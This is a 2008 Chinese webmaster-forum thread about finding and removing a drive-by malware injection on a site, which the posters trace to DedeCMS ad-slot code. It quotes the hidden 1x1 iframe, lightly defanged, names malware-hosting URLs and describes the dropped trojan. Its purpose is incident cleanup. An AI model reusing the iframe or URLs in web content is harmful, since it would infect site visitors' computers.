过期域名预定抢注

 找回密碼
 免费注册

webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到?

[複製鏈接]
發表於 2008-1-10 16:50:35 | 顯示全部樓層
請老大仔細的查查吧,剛又發現了幾個,全是免殺的~~一個勁的往外蹦,但是我的卡卡即不報~~( [) B3 B& p: y* [4 H1 T, `
http://ppp.749571.com/dm/test.htm( j& B/ k& a, Z- ?; V+ I
http://www.985676.cn/encrypt/mm.htm
+ o) R7 x+ b  ^$ c7 X  x$ V這兩個是免殺的,還有幾個沒記下來,
6 V; ]' S+ P3 X7 v* k+ a, O- D這掛馬的兔崽子有一手,隱藏的很好啊~~一般人都看不出來~
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-10 17:01:37 | 顯示全部樓層
會在C盤下產生 CRESS1.EXE 0 k. k! N6 k7 V. h& I9 ?
然後增加IE的BHO的木馬 還釋放驅動
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-10 17:34:02 | 顯示全部樓層
昏 他藏得好隱秘  找到了 放毒得地方了
6 {5 c1 Z; F1 w* ?+ n1 o3 U$ O
8 r. F; C. R7 F% uiframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>7 w' R& \- M" G" q. G+ ]
然後再這個地址轉到ppp.749571.co m/dm/test.htm
* q  ~  M6 }5 {+ k( j0 o: {5 {+ o! D  k為了跟蹤這個病毒 自己失誤的。。。。哎。修復中ing。。。。2 r# o# Y6 V7 J. |
靜水趕快清理了吧
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-10 18:00:24 | 顯示全部樓層
原帖由 20082008 於 2008-1-9 16:33 發表
) }* j4 a9 f4 l8 b/ b) O( C沒裝REAL就沒事,好在我重新裝的系統:
1 \" }( {5 T2 A7 ^3 l
說的沒錯
回復 给力 爆菊

使用道具 舉報

 樓主| 發表於 2008-1-11 02:27:32 | 顯示全部樓層
原帖由 freelzyr 於 2008-1-10 16:47 發表 . Q; Y, z% Z- m, [
進dede後台 ' ]5 G4 _% y$ b' S3 v: Q2 V; ]
檢查 ad_js.php?aid=1  
1 S- J8 k# `0 @9 S9 Z3 v3 Iad_js.php?aid=2
. r/ D- [6 Q! O" o, ~ad_js.php?aid=3
6 |* l) g0 T# _3 Fad_js.php?aid=4
7 T8 R' i& X3 l- U% M( u$ o8 f6 B7 N' q8 Z
這幾個廣告 裡面的代碼
/ M; Y( {% ^, k& I- ~8 M/ [) j3 ?, E在這幾個 掉茅廁位 裡面   含有 木馬的 代碼
6 X/ K4 X0 {& h  j2 ?) |

1 ~3 x' L8 Q6 x2 R# ^, j6 O這個檢查了沒有的
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-11 09:09:11 | 顯示全部樓層
原帖由 靜水流深 於 2008-1-11 02:27 發表 # r& C6 a5 D3 Z

6 y; L* t# a0 i. t' p6 m# a) X7 N/ Z. q& U1 S% _+ P( e+ O( P* u# L- l
這個檢查了沒有的

2 K! Y  f6 ~2 B3 Z& ~( q) k
) @+ L' b1 K; d) g: @& j
& E" B1 c( b0 O6 y/ C" w" `我看過了,有掛馬的代碼,代碼已經在你的另一個貼子裡貼出來了
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-11 12:44:57 | 顯示全部樓層
原帖由 靜水流深 於 2008-1-11 02:27 發表 # {" v9 P8 L% S$ A

& c" m5 ?5 _4 Q2 n; Q' z' S1 l) B2 x9 w+ A+ g
這個檢查了沒有的

( \1 ~% K7 A% _. G* `木馬就是在這裡裡啊
9 Q3 H" v+ [) v4 Y在後台的掉茅廁位設置那
6 G: K& p/ y$ L0 ]2 E
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-30 10:38:22 | 顯示全部樓層
現在明瞭.( w& k9 W4 H6 U* Y( q
有人收流量做ppp.749571.co m的..* z* C& w& t$ E
最近被掛馬的話. 都改成js了. 不用iframe了
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-30 11:53:15 | 顯示全部樓層
菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景
回復 给力 爆菊

使用道具 舉報

您需要登錄後才可以回帖 登錄 | 免费注册

本版積分規則

过期高净值品牌域名预定抢注

點基跨境 數位編輯創業論壇

GMT+8, 2025-4-17 09:13

By DZ X3.5

小黑屋

快速回復 返回頂部 返回列表